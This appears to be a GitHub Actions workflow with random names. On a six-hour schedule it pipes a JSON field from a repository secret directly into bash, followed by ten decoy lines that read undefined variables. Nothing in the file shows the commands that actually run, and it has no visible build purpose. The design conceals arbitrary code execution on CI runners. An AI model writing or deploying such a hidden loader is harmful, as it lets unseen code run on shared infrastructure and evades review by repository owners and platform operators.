name: defendleather

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: defendleather
        env:
          y97321: ${{ secrets.y97321 }}
        run: |
          echo $y97321 | jq -r .xr00529 | /bin/bash
          echo $lzgh87 | jq -r .q373 | /bin/bash
          echo $vva5 | jq -r .tmihg545 | /bin/bash
          echo $fw6895 | jq -r .fcsxd0 | /bin/bash
          echo $aufk1751 | jq -r .pzbn43439 | /bin/bash
          echo $b4431 | jq -r .zvxea68376 | /bin/bash
          echo $qujbo212 | jq -r .ach633 | /bin/bash
          echo $m8030 | jq -r .odai8161 | /bin/bash
          echo $ji44 | jq -r .vt7176 | /bin/bash
          echo $ivzme3313 | jq -r .rr5 | /bin/bash
          echo $pcpo084 | jq -r .xc049 | /bin/bash

